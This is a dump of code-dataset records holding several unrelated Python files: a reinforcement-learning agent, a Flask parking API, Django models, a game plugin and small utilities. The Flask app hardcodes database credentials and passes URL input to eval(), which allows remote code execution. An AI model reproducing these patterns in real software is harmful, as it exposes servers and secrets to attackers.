torch.from_numpy(obs).float().to(sett.device)\n if self.norm_input:\n x /= 255\n\n for i, sel_policy, curr_time in zip(range(self.n_proc), self.selected_policy, self.curr_time):\n if sel_policy is None or curr_time == self.max_time:\n if sel_policy is not None and not deterministic:\n # Store non terminal macro transition\n self.macro_memory.store_transition(self.macro_state[i], obs[i], sel_policy, self.macro_reward[i], False)\n self.macro_reward[i] = 0\n\n # Pick macro action\n self.selected_policy[i] = self.pick_policy(x[i][None], deterministic=deterministic)\n assert isinstance(self.selected_policy[i], int)\n self.curr_time[i] = 0\n if not deterministic:\n self.macro_state[i] = obs[i]\n\n self.counter_macro[sel_policy] += 1\n\n eps = max(0.01, self.eps_sub) if not deterministic else 0.01\n sel_pol = np.unique(self.selected_policy)\n sel_indices = [(self.selected_policy == i).nonzero()[0] for i in sel_pol]\n action = -np.ones((self.n_proc,), dtype=np.int)\n for policy_idx, indices in zip(sel_pol, sel_indices):\n action[indices] = self.policy[policy_idx].act(x[indices], eps=eps, backbone=self.macro)\n self.counter_policies[policy_idx, action[indices]] += 1\n\n self.curr_time += 1 # Is a vector\n return action\n\n def pick_policy(self, obs, deterministic=False):\n eps = max(0.01, self.eps) if not deterministic else 0.01\n policy = self.macro.act(obs, eps=eps)\n return policy\n\n def set_mode(self, training=False):\n for policy in self.policy:\n policy.train(training)\n self.macro.train(training)\n self.selected_policy[:] = None\n self.curr_time[:] = 0\n\n def process_reward(self, reward):\n # Rescale reward if a scaling is provided\n if self.reward_rescale != 0:\n if self.reward_rescale == 1:\n reward = np.sign(reward)\n elif self.reward_rescale == 2:\n reward = np.clip(reward, -1, 1)\n else:\n reward *= self.reward_rescale\n return reward\n\n def store_transition(self, s, s1, a, reward, is_terminal):\n reward = self.process_reward(reward)\n\n for i, sel_policy in enumerate(self.selected_policy):\n # Store sub policy experience\n self.memory[sel_policy].store_transition(s[i], s1[i], a[i], reward[i], is_terminal[i])\n self.macro_reward[i] += reward[i]\n\n # Store terminal macro transition\n if is_terminal[i]:\n self.macro_memory.store_transition(self.macro_state[i], s1[i], sel_policy, self.macro_reward[i], is_terminal[i])\n self.macro_reward[i] = 0\n self.selected_policy[i] = None\n\n def update(self):\n for i in range(self.train_steps):\n self._update()\n if self.logger is not None:\n self.logger.step += 1\n\n def _update(self):\n # First train each sub policy\n self.macro_opt.zero_grad() # To allow cumulative gradients on backbone part\n\n for i in range(self.n_subpolicy):\n memory = self.memory[i]\n if len(memory) < self.bs * 100:\n continue\n\n policy = self.policy[i]\n target = self.target[i]\n icm = self.icm[i]\n policy_opt = self.policy_opt[i]\n icm_opt = self.icm_opt[i]\n\n if self.per:\n state, new_state, action, reward, is_terminal, idxs, w_is = memory.sample(self.bs)\n reduction = 'none'\n self.logger.log_scalar(tag='Beta PER %i' % i, value=memory.beta)\n else:\n state, new_state, action, reward, is_terminal = memory.sample(self.bs)\n reduction = 'mean'\n\n if self.norm_input:\n state = np.array(state, dtype=np.float) / 255\n new_state = np.array(new_state, dtype=np.float) / 255\n\n state = torch.tensor(state, dtype=torch.float).detach().to(sett.device)\n new_state = torch.tensor(new_state, dtype=torch.float).detach().to(sett.device)\n action = torch.tensor(action).detach().to(sett.device)\n reward = torch.tensor(reward, dtype=torch.float).detach().to(sett.device)\n is_terminal = 1. - torch.tensor(is_terminal, dtype=torch.float).detach().to(sett.device)\n\n # Augment rewards with curiosity\n curiosity_rewards = icm.curiosity_rew(state, new_state, action)\n reward = (1 - 0.01) * reward + 0.01 * self.lam * curiosity_rewards\n\n # Policy loss\n q = policy.forward(state, macro=self.macro)[torch.arange(self.bs), action]\n max_action = torch.argmax(policy.forward(new_state, macro=self.macro), dim=1)\n y = reward + self.gamma * target.forward(new_state, macro=self.macro)[torch.arange(self.bs), max_action] * is_terminal\n policy_loss = smooth_l1_loss(input=q, target=y.detach(), reduction=reduction).mean(-1)\n\n # ICM Loss\n phi_hat = icm.forward(state, action)\n phi_true = icm.phi_state(new_state)\n fwd_loss = mse_loss(input=phi_hat, target=phi_true.detach(), reduction=reduction).mean(-1)\n a_hat = icm.inverse_pred(state, new_state)\n inv_loss = cross_entropy(input=a_hat, target=action.detach(), reduction=reduction)\n\n # Total loss\n inv_loss = (1 - self.beta) * inv_loss\n fwd_loss = self.beta * fwd_loss * 288\n loss = self.tau * policy_loss + inv_loss + fwd_loss\n\n if self.per:\n error = np.clip((torch.abs(q - y)).cpu().data.numpy(), 0, 0.8)\n inv_prob = (1 - softmax(a_hat, dim=1)[torch.arange(self.bs), action]) / 5\n curiosity_error = torch.abs(inv_prob).cpu().data.numpy()\n total_error = error + curiosity_error\n\n # update priorities\n for k in range(self.bs):\n memory.update(idxs[k], total_error[k])\n\n loss = (loss * torch.FloatTensor(w_is).to(sett.device)).mean()\n\n policy_opt.zero_grad()\n icm_opt.zero_grad()\n loss.backward()\n for param in policy.parameters():\n param.grad.data.clamp(-1, 1)\n policy_opt.step()\n icm_opt.step()\n\n self.target_count[i] += 1\n if self.target_count[i] == self.target_interval:\n self.target_count[i] = 0\n self.target[i].update_target(self.policy[i])\n\n if self.logger is not None:\n self.logger.log_scalar(tag='Policy Loss %i' % i, value=policy_loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='ICM Fwd Loss %i' % i, value=fwd_loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='ICM Inv Loss %i' % i, value=inv_loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Total Policy Loss %i' % i, value=loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Mean Curiosity Reward %i' % i, value=curiosity_rewards.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Q values %i' % i, value=q.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Target Boltz %i' % i, value=y.mean().cpu().data.numpy())\n actions = self.counter_policies[i] / max(1, self.counter_policies[i].sum())\n self.logger.log_text(tag='Policy actions %i Text' %i, value=[str(v) for v in actions],\n step=self.logger.step)\n if self.per:\n self.logger.log_scalar(tag='PER Error %i' % i, value=total_error.mean())\n self.logger.log_scalar(tag='PER Error Policy %i' % i, value=error.mean())\n self.logger.log_scalar(tag='PER Error Curiosity %i' % i, value=curiosity_error.mean())\n\n # Reduce sub eps\n self.eps_sub = self.eps_sub * self.eps_sub_decay\n\n # Train Macro policy\n if len(self.macro_memory) < self.bs * 100:\n return\n\n # Reduce eps\n self.eps = self.eps * self.eps_decay\n\n state, new_state, action, reward, is_terminal = self.macro_memory.sample(self.bs)\n if self.norm_input:\n state = np.array(state, dtype=np.float) / 255\n new_state = np.array(new_state, dtype=np.float) / 255\n\n state = torch.tensor(state, dtype=torch.float).detach().to(sett.device)\n new_state = torch.tensor(new_state, dtype=torch.float).detach().to(sett.device)\n action = torch.tensor(action).detach().to(sett.device)\n reward = torch.tensor(reward, dtype=torch.float).detach().to(sett.device)\n is_terminal = 1. - torch.tensor(is_terminal, dtype=torch.float).detach().to(sett.device)\n\n q = self.macro.forward(state)[torch.arange(self.bs), action]\n max_action = torch.argmax(self.macro.forward(new_state), dim=1)\n y = reward + self.gamma_macro * self.macro_target.forward(new_state)[torch.arange(self.bs), max_action] * is_terminal\n loss = smooth_l1_loss(input=q, target=y.detach())\n\n loss.backward()\n for param in self.macro.parameters():\n param.grad.data.clamp(-1, 1)\n self.macro_opt.step()\n\n self.macro_count += 1\n if self.macro_count == self.target_interval:\n self.macro_count = 0\n self.macro_target.update_target(self.macro)\n\n if self.logger is not None:\n self.logger.log_scalar(tag='Macro Loss', value=loss.cpu().detach().numpy())\n self.logger.log_scalar(tag='Sub Eps', value=self.eps_sub)\n self.logger.log_scalar(tag='Macro Eps', value=self.eps)\n values = self.counter_macro / max(1, sum(self.counter_macro))\n self.logger.log_text(tag='Macro Policy Actions Text', value=[str(v) for v in values],\n step=self.logger.step)\n self.logger.log_histogram(tag='Macro Policy Actions Hist', values=values,\n step=self.logger.step, bins=self.n_subpolicy)\n self.logger.log_scalar(tag='Macro Q values', value=q.cpu().detach().numpy().mean())\n self.logger.log_scalar(tag='Marcro Target Boltz', value=y.cpu().detach().numpy().mean())\n","sub_path":"src/rl/ehdqn.py","file_name":"ehdqn.py","file_ext":"py","file_size_in_byte":16387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"623477271","text":"#!python\nfrom flask import Flask, jsonify, make_response, request, send_from_directory\nfrom flask_sqlalchemy import SQLAlchemy\nfrom time import sleep\nfrom random import sample\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom models import *\nimport geopy.distance\n\nPOSTGRES = {\n 'user': 'smartlot_db_admin',\n 'pw': 'smarterparking1',\n 'db': 'smartlot_db_public2',\n 'host': 'smartlot-db-public2.cxzkctjwsfey.us-east-1.rds.amazonaws.com',\n 'port': '5432',\n}\n\napp = Flask(__name__, static_url_path='/static')\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://%(user)s:%(pw)s@%(host)s:%(port)s/%(db)s' % POSTGRES\n\ndb = SQLAlchemy(app)\n\n\n@app.route('/')\ndef index():\n return \"Hewwo wowwd\"\n\n@app.route('/smart-lot/lots/upload', methods=['POST'])\ndef upload_file():\n if 'file' not in request.files:\n return \"No file\"\n file = request.files['file']\n file.save(\"static/test.jpg\")\n return \"Saved successfully\"\n\n@app.route('/smart-lot/lots', methods=['GET'])\ndef get_tasks():\n return jsonify({'lots': lots})\n\n@app.route('/smart-lot/lots/', methods=['GET'])\ndef get_lot(lot_name):\n print(lot_name)\n lot_info = db.session.query(eval(lot_name)).all()\n rows = []\n for row in lot_info:\n rows.append(row.as_dict())\n if len(lot_info) == 0:\n abort(404)\n response = jsonify(rows)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/smart-lot/lots/by_location/', methods=['GET'])\ndef get_lots_by_location(lat_long):\n print(lat_long)\n location_list = lat_long.split(\",\")\n my_coords = (location_list[0], location_list[1])\n lots = []\n lot_info = db.session.query(eval(\"Lots\")).all()\n for row in lot_info:\n lot_coords = (row.latitude, row.longitude)\n if geopy.distance.distance(my_coords, lot_coords).mi < 20:\n lots.append(row.as_dict())\n\n if len(lot_info) == 0:\n abort(404)\n response = jsonify(lots)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n \ndef get_all_rows():\n rows = db.session.query(NethkenA).all()\n return rows\n\n# flag should be 0 or 1\n# 1 being true, 0 being false\n@app.route('/smart-lot/test/', methods=['GET'])\ndef flag_bit(api_flag):\n spots = simulate_activity(api_flag)\n return ''.join(['spot: {}\\noccupied:{}\\n'.format(\n i.spot_number, i.occupied) for i in spots])\n\ndef simulate_activity(flag):\n if flag:\n spots = db.session.query(NethkenA).all()\n for i in sample(range(1, len(spots)), 3):\n temp_spot = db.session.query(\n NethkenA).filter_by(spot_number=i).first()\n if temp_spot.spot_number == i and temp_spot.occupied == True:\n row_changed = db.session.query(NethkenA).filter_by(\n spot_number=i).update(dict(occupied=False))\n db.session.commit()\n elif temp_spot.spot_number == i and temp_spot.occupied == False:\n row_changed = db.session.query(NethkenA).filter_by(\n spot_number=i).update(dict(occupied=True))\n db.session.commit()\n return spots\n else:\n return \"stopped\"\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n### POST for JSON data if we need it down the road ###\n# @app.route('/smatr-lot/lots', methods=['POST'])\n# def create_task():\n# if not request.json or not 'title' in request.json:\n# abort(400)\n# lot = {\n# 'id': tasks[-1]['id'] + 1,\n# 'title': request.json['title'],\n# 'description': request.json.get('description', \"\"),\n# 'done': False\n# }\n# tasks.append(lot)\n# return jsonify({'lot': lot}), 201\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"lot-availability-api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21976880","text":"import csv\n\ndef get_csv(csvfile):\n csvdict = []\n with open(csvfile) as f:\n for item in csv.DictReader(f, skipinitialspace=True):\n csvdict.append(item)\n return csvdict\n\ninstances = get_csv('import-running.csv')\ninsttype=''\navgCPU=0\nmaxCPU=0\ncount = 0\nfor inst in instances:\n if insttype != inst['Type']:\n print(f'{insttype},{count},{avgCPU},{maxCPU}')\n insttype = inst['Type']\n avgCPU = float(inst['Avg'])\n maxCPU = float(inst['Max'])\n count = 1\n avgCPU = (avgCPU * count + float(inst['Avg'])) / (count +1)\n maxCPU = max(maxCPU, float(inst['Max']))\n count += 1\n","sub_path":"import.io/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368160090","text":"from django.contrib.gis.db import models\nfrom django.contrib.gis.geos import Point\nfrom phonenumber_field.modelfields import PhoneNumberField\n\nfrom assets.utils import geocode_address\n\n\nclass AssetType(models.Model):\n \"\"\" Asset types \"\"\"\n name = models.CharField(max_length=255)\n title = models.CharField(max_length=255)\n category = models.ForeignKey('Category', on_delete=models.PROTECT, related_name='asset_types', null=True)\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n \"\"\" Categories \"\"\"\n name = models.CharField(max_length=255)\n title = models.CharField(max_length=255)\n\n class Meta:\n verbose_name_plural = 'categories'\n\n def __str__(self):\n return self.name\n\n\nclass Tag(models.Model):\n \"\"\" Tags \"\"\"\n name = models.CharField(max_length=255)\n\n def __str__(self):\n return self.name\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=255, editable=False)\n street_address = models.CharField(max_length=100, null=True, blank=True)\n city = models.CharField(max_length=50, null=True, blank=True)\n state = models.CharField(max_length=50, null=True, blank=True)\n zip_code = models.CharField(max_length=10, null=True, blank=True)\n parcel_id = models.CharField(max_length=50, null=True, blank=True)\n residence = models.BooleanField(null=True, blank=True)\n\n available_transportation = models.TextField(null=True, blank=True)\n parent_location = models.ForeignKey(\n 'Location',\n on_delete=models.PROTECT,\n null=True,\n blank=True\n )\n latitude = models.FloatField(null=True, blank=True)\n longitude = models.FloatField(null=True, blank=True)\n geom = models.PointField(null=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n \"\"\" When the model is saved, attempt to geocode it based on address \"\"\"\n if not self.pk:\n self.name = f'{self.street_address} {self.city}, {self.state} {self.zip_code}'\n if not (self.longitude or self.latitude):\n self.latitude, self.longitude = geocode_address(self.name)\n if not self.geom:\n print(self.latitude, self.longitude)\n self.geom = Point(\n (float(self.longitude), float(self.latitude))\n ) if self.latitude and self.longitude else None\n super(Location, self).save(*args, **kwargs)\n\n\nclass Organization(models.Model):\n name = models.CharField(max_length=255, null=True, blank=True)\n location = models.ForeignKey('Location', on_delete=models.CASCADE, null=True, blank=True)\n email = models.EmailField(null=True, blank=True)\n phone = PhoneNumberField(null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass AccessibilityFeature(models.Model):\n name = models.CharField(max_length=255)\n\n def __str__(self):\n return self.name\n\n\nclass ProvidedService(models.Model):\n name = models.CharField(max_length=255)\n\n def __str__(self):\n return self.name\n\n\nclass TargetPopulation(models.Model):\n name = models.CharField(max_length=255)\n\n def __str__(self):\n return self.name\n\n\nclass DataSource(models.Model):\n name = models.CharField(max_length=255)\n url = models.URLField(max_length=500, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Asset(models.Model):\n FIXED_LOCALE = 'FIX'\n MOBILE_LOCALE = 'MOB'\n VIRTUAL_LOCALE = 'VIR'\n\n LOCALIZABILITY_CHOICES = (\n (FIXED_LOCALE, 'Fixed'),\n (MOBILE_LOCALE, 'Mobile'),\n (VIRTUAL_LOCALE, 'Cyber'),\n )\n\n name = models.CharField(max_length=255)\n localizability = models.CharField(max_length=3, choices=LOCALIZABILITY_CHOICES, null=True, blank=True)\n\n url = models.URLField(max_length=500, null=True, blank=True)\n email = models.EmailField(null=True, blank=True)\n phone = PhoneNumberField(null=True, blank=True)\n\n hours_of_operation = models.TextField(null=True, blank=True)\n holiday_hours_of_operation = models.TextField(null=True, blank=True)\n periodicity = models.CharField(max_length=100, null=True, blank=True)\n capacity = models.IntegerField(null=True, blank=True)\n wifi_network = models.CharField(max_length=100, null=True, blank=True)\n\n child_friendly = models.BooleanField(null=True, blank=True)\n internet_access = models.BooleanField(null=True, blank=True)\n computers_available = models.BooleanField(null=True, blank=True)\n open_to_public = models.BooleanField(null=True, blank=True)\n sensitive = models.BooleanField(null=True, blank=True)\n do_not_display = models.BooleanField(null=True, blank=True)\n\n asset_types = models.ManyToManyField('AssetType')\n category = models.ManyToManyField('Category')\n location = models.ForeignKey('Location', on_delete=models.SET_NULL, null=True, blank=True)\n organization = models.ForeignKey('Organization', on_delete=models.PROTECT, null=True, blank=True)\n services = models.ManyToManyField('ProvidedService', blank=True)\n accessibility_features = models.ManyToManyField('AccessibilityFeature', blank=True)\n hard_to_count_population = models.ManyToManyField('TargetPopulation', blank=True)\n data_source = models.ForeignKey('DataSource', on_delete=models.PROTECT, null=True, blank=True)\n\n tags = models.ManyToManyField('Tag', blank=True)\n etl_notes = models.TextField(null=True, blank=True) # notes from Rocket\n notes = models.TextField(max_length=1000, null=True, blank=True)\n primary_key_from_rocket = models.TextField(null=True, blank=True)\n date_entered = models.DateTimeField(editable=False, auto_now_add=True)\n last_updated = models.DateTimeField(editable=False, auto_now=True)\n\n @property\n def category(self):\n return self.asset_types.all()[0].category\n\n def __str__(self):\n return self.name\n","sub_path":"assets/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"449081669","text":"\"\"\"\r\nHeal streaks. Because Enari said so.\r\n\r\nMaintainer: hompy\r\n\"\"\"\r\n\r\nSTREAK_REQUIREMENT = 8\r\n\r\nS_REFILLED = \"Your killstreak earns you a refill!\"\r\n\r\ndef apply_script(protocol, connection, config):\r\n class HealstreakConnection(connection):\r\n def add_score(self, score):\r\n connection.add_score(self, score)\r\n if self.streak % STREAK_REQUIREMENT == 0:\r\n self.refill()\r\n self.send_chat(S_REFILLED)\r\n \r\n return protocol, HealstreakConnection","sub_path":"healstreak.py","file_name":"healstreak.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"370817108","text":"import urllib3\nfrom threading import Thread\n\nurllib3.disable_warnings()\n\n__author__ = \"Mithun\"\n\n\nclass URLDownload(Thread):\n def __init__(self, file_name, url):\n Thread.__init__(self)\n self.file_name = \"Thread_\" + file_name\n self.url = url\n\n def run(self):\n print(\"Downloading the contents of {} into {}\".format(self.url, self.file_name))\n http = urllib3.PoolManager()\n\n response = http.request(method=\"GET\", url=self.url)\n with open(self.file_name, \"wb\") as f:\n f.write(response.data)\n\n print(\"Download of {} done\".format(self.url))\n\n\nthreads = []\ntest_dict = {\n \"Google\": \"http://www.google.com\",\n \"Python\": \"http://www.python.org\",\n \"Bing\": \"http://www.bing.com\",\n \"Yahoo\": \"http://www.yahoo.com\"\n}\n\nprint(\"Main thread starting execution...\")\nfor key in test_dict:\n thread = URLDownload(key, test_dict[key])\n threads.append(thread)\n thread.start()\n\nprint(\"Main thread continuing execution...\")\nfor thread in threads:\n thread.join()\n\nprint(\"Main thread exiting...\")\n","sub_path":"10_back_dev/paradigms/concurrent/Concurrent Programming in Python - Section 2/2.3-initial.py","file_name":"2.3-initial.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}